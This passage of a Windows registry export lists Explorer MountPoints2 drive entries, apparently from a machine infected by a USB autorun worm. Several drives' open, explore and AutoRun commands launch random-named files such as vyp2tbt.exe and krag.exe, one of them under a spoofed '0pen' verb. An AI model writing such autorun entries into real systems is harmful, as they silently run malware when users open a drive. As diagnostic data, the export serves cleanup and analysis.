[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell\open] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell\open\Command] @="tmf3w3g0.com" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9620ae1e-d2f8-11dc-bd66-00142a84709e}\Shell\open\Default] @="1" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,\ 5f,5f,5f,5f,5f,01,00,01,01,ee,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,00,10,00,00,09,03,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell] @="Open" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\AutoRun] "Extended"="" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\AutoRun\command] @="vyp2tbt.exe" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\explore] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\explore\Command] @="vyp2tbt.exe" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\open] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\open\Command] @="vyp2tbt.exe" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{a87dd044-c03f-11dc-bd08-00142a84709e}\Shell\open\Default] @="1" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{af73c342-9f4c-11da-aed8-806d6172696f}] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{af73c343-9f4c-11da-aed8-806d6172696f}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,01,00,01,01,ee,ff,ff,ff,ff,\ ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,60,00,00,00,09,00,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{af73c343-9f4c-11da-aed8-806d6172696f}\Name] @="NBA LIVE 07" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{af73c343-9f4c-11da-aed8-806d6172696f}\_Autorun] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{af73c343-9f4c-11da-aed8-806d6172696f}\_Autorun\DefaultIcon] @="E:\\ubuntu.ico" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{af73c344-9f4c-11da-aed8-806d6172696f}] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{af73c345-9f4c-11da-aed8-806d6172696f}] "BaseClass"="Drive" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}] "BaseClass"="Drive" "_AutorunStatus"=hex:01,00,01,00,00,01,00,df,df,5f,df,5f,5f,5f,5f,df,df,5f,5f,\ 5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,5f,df,df,df,5f,5f,df,\ 5f,5f,5f,5f,5f,01,00,01,01,ee,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\ ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,00,10,00,00,09,02,00,00 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}\Shell] @="0pen" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}\Shell\0pen] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}\Shell\0pen\command] @="krag.exe" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}\Shell\Autoplay] "MUIVerb"="@shell32.dll,-8504" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}\Shell\Autoplay\DropTarget] "CLSID"="{f26a669a-bcbb-4e37-abf9-7325da15f931}" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}\Shell\AutoRun] "Extended"="" @="Auto&Play" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{e12e9ef8-a675-11db-8a8d-00142a84709e}\Shell\AutoRun\command] @="C:\\WINDOWS\\system32\\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL krag.exe" [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\CPC] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\CPC\Volume] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\CPC\Volume\{af73c342-9f4c-11da-aed8-806d6172696f}] "Data"=hex:00,00,00,00,5c,00,5c,00,3f,00,5c,00,46,00,44,00,43,00,23,00,47,00,\ 45,00,4e,00,45,00,52,00,49,00,43,00,5f,00,46,00,4c,00,4f,00,50,00,50,00,59,\ 00,5f,00,44,00,52,00,49,00,56,00,45,00,23,00,35,00,26,00,36,00,65,00,64,00,\ 62,00,61,00,62,00,26,00,30,00,26,00,30,00,23,00,7b,00,35,00,33,00,66,00,35,\ 00,36,00,33,00,30,00,64,00,2d,00,62,00,36,00,62,00,66,00,2d,00,31,00,31,00,\ 64,00,30,00,2d,00,39,00,34,00,66,00,32,00,2d,00,30,00,30,00,61,00,30,00,63,\ 00,39,00,31,00,65,00,66,00,62,00,38,00,62,00,7d,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,5c,00,5c,00,3f,00,5c,00,56,00,6f,00,6c,00,75,00,6d,00,\ 65,00,7b,00,61,00,66,00,37,00,33,00,63,00,33,00,34,00,32,00,2d,00,39,00,66,\ 00,34,00,63,00,2d,00,31,00,31,00,64,00,61,00,2d,00,61,00,65,00,64,00,38,00,\ 2d,00,38,00,30,00,36,00,64,00,36,00,31,00,37,00,32,00,36,00,39,00,36,00,66,\ 00,7d,00,5c,00,00,00,49,00,6e,00,76,00,61,00,6c,00,69,00,64,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,49,00,\ 6e,00,76,00,61,00,6c,00,69,00,64,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,01,10,00,\ 00,bd,ad,db,ba,bd,ad,db,ba,bd,ad,db,ba,bd,ad,db,ba,bd,ad,db,ba,00,00,00,00,\ 00,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,\ 00 "Generation"=dword:00000002 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\CPC\Volume\{af73c343-9f4c-11da-aed8-806d6172696f}] "Data"=hex:00,00,00,00,5c,00,5c,00,3f,00,5c,00,49,00,44,00,45,00,23,00,43,00,\ 64,00,52,00,6f,00,6d,00,53,00,4f,00,4e,00,59,00,5f,00,43,00,44,00,2d,00,52,\ 00,57,00,5f,00,5f,00,43,00,52,00,58,00,33,00,32,00,30,00,45,00,45,00,5f,00,\ 5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,\ 00,5f,00,5f,00,5f,00,5f,00,5f,00,5f,00,52,00,59,00,4b,00,33,00,5f,00,5f,00,\ 5f,00,5f,00,23,00,33,00,30,00,33,00,32,00,33,00,35,00,33,00,30,00,33,00,30,\ 00,33,00,31,00,33,00,30,00,33,00,31,00,33,00,30,00,33,00,30,00,33,00,32,00,\ 33,00,30,00,33,00,31,00,33,00,39,00,33,00,30,00,33,00,30,00,32,00,30,00,32,\ 00,30,00,32,00,30,00,32,00,30,00,23,00,7b,00,35,00,33,00,66,00,35,00,36,00,\ 33,00,30,00,64,00,2d,00,62,00,36,00,62,00,66,00,2d,00,31,00,31,00,64,00,30,\ 00,2d,00,39,00,34,00,66,00,32,00,2d,00,30,00,30,00,61,00,30,00,63,00,39,00,\ 31,00,65,00,66,00,62,00,38,00,62,00,7d,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,5c,00,5c,00,3f,00,5c,00,56,00,6f,00,6c,00,75,00,6d,00,\ 65,00,7b,00,61,00,66,00,37,00,33,00,63,00,33,00,34,00,33,00,2d,00,39,00,66,\ 00,34,00,63,00,2d,00,31,00,31,00,64,00,61,00,2d,00,61,00,65,00,64,00,38,00,\ 2d,00,38,00,30,00,36,00,64,00,36,00,31,00,37,00,32,00,36,00,39,00,36,00,66,\ 00,7d,00,5c,00,00,00,49,00,6e,00,76,00,61,00,6c,00,69,00,64,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,49,00,\ 6e,00,76,00,61,00,6c,00,69,00,64,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,10,00,00,00,1f,01,00,\ 00,bd,ad,db,ba,bd,ad,db,ba,bd,ad,db,ba,bd,ad,db,ba,bd,ad,db,ba,00,00,00,00,\ 00,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,\ 00 "Generation"=dword:00000002 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\CPC\Volume\{af73c344-9f4c-11da-aed8-806d6172696f}] "Data"=hex:00,00,00,00,5c,00,5c,00,3f,00,5c,00,53,00,54,00,4f,00,52,00,41,00,\ 47,00,45,00,23,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,23,00,31,00,26,00,33,\ 00,30,00,61,00,39,00,36,00,35,00,39,00,38,00,26,00,30,00,26,00,53,00,69,00,\ 67,00,6e,00,61,00,74,00,75,00,72,00,65,00,36,00,44,00,41,00,30,00,36,00,44,\ 00,41,00,4f,00,66,00,66,00,73,00,65,00,74,00,37,00,45,00,30,00,30,00,4c,00,\ 65,00,6e,00,67,00,74,00,68,00,34,00,41,00,38,00,35,00,32,00,38,00,32,00,30,\ 00,30,00,23,00,7b,00,35,00,33,00,66,00,35,00,36,00,33,00,30,00,64,00,2d,00,\ 62,00,36,00,62,00,66,00,2d,00,31,00,31,00,64,00,30,00,2d,00,39,00,34,00,66,\ 00,32,00,2d,00,30,00,30,00,61,00,30,00,63,00,39,00,31,00,65,00,66,00,62,00,\ 38,00,62,00,7d,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,5c,00,5c,00,3f,00,5c,00,56,00,6f,00,6c,00,75,00,6d,00,\ 65,00,7b,00,61,00,66,00,37,00,33,00,63,00,33,00,34,00,34,00,2d,00,39,00,66,\ 00,34,00,63,00,2d,00,31,00,31,00,64,00,61,00,2d,00,61,00,65,00,64,00,38,00,\ 2d,00,38,00,30,00,36,00,64,00,36,00,31,00,37,00,32,00,36,00,39,00,36,00,66,\ 00,7d,00,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,4e,00,\ 54,00,46,00,53,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,08,00,00,00,01,10,00,\ 00,ff,00,07,00,ff,00,00,00,36,00,00,00,50,c6,58,98,00,00,00,00,00,00,00,30,\ 00,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,\ 00 "Generation"=dword:00000002 [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\CPC\Volume\{af73c345-9f4c-11da-aed8-806d6172696f}] "Data"=hex:00,00,00,00,5c,00,5c,00,3f,00,5c,00,53,00,54,00,4f,00,52,00,41,00,\ 47,00,45,00,23,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,23,00,31,00,26,00,33,\ 00,30,00,61,00,39,00,36,00,35,00,39,00,38,00,26,00,30,00,26,00,53,00,69,00,\ 67,00,6e,00,61,00,74,00,75,00,72,00,65,00,36,00,44,00,41,00,30,00,36,00,44,\ 00,41,00,4f,00,66,00,66,00,73,00,65,00,74,00,34,00,41,00,38,00,35,00,33,00,\ 37,00,45,00,30,00,30,00,4c,00,65,00,6e,00,67,00,74,00,68,00,34,00,41,00,37,\ 00,44,00,35,00,30,00,30,00,30,00,30,00,23,00,7b,00,35,00,33,00,66,00,35,00,\ 36,00,33,00,30,00,64,00,2d,00,62,00,36,00,62,00,66,00,2d,00,31,00,31,00,64,\ 00,30,00,2d,00,39,00,34,00,66,00,32,00,2d,00,30,00,30,00,61,00,30,00,63,00,\ 39,00,31,00,65,00,66,00,62,00,38,00,62,00,7d,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,5c,00,5c,00,3f,00,5c,00,56,00,6f,00,6c,00,75,00,6d,00,\ 65,00,7b,00,61,00,66,00,37,00,33,00,63,00,33,00,34,00,35,00,2d,00,39,00,66,\ 00,34,00,63,00,2d,00,31,00,31,00,64,00,61,00,2d,00,61,00,65,00,64,00,38,00,\ 2d,00,38,00,30,00,36,00,64,00,36,00,31,00,37,00,32,00,36,00,39,00,36,00,66,\ 00,7d,00,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,4e,00,\ 54,00,46,00,53,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,08,00,00,00,01,10,00,\ 00,ff,00,07,00,ff,00,00,00,16,00,00,00,81,ef,79,d8,00,00,00,00,00,00,00,30,\ 00,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,00,\ 00 "Generation"=dword:00000002

ndmmxiaomayi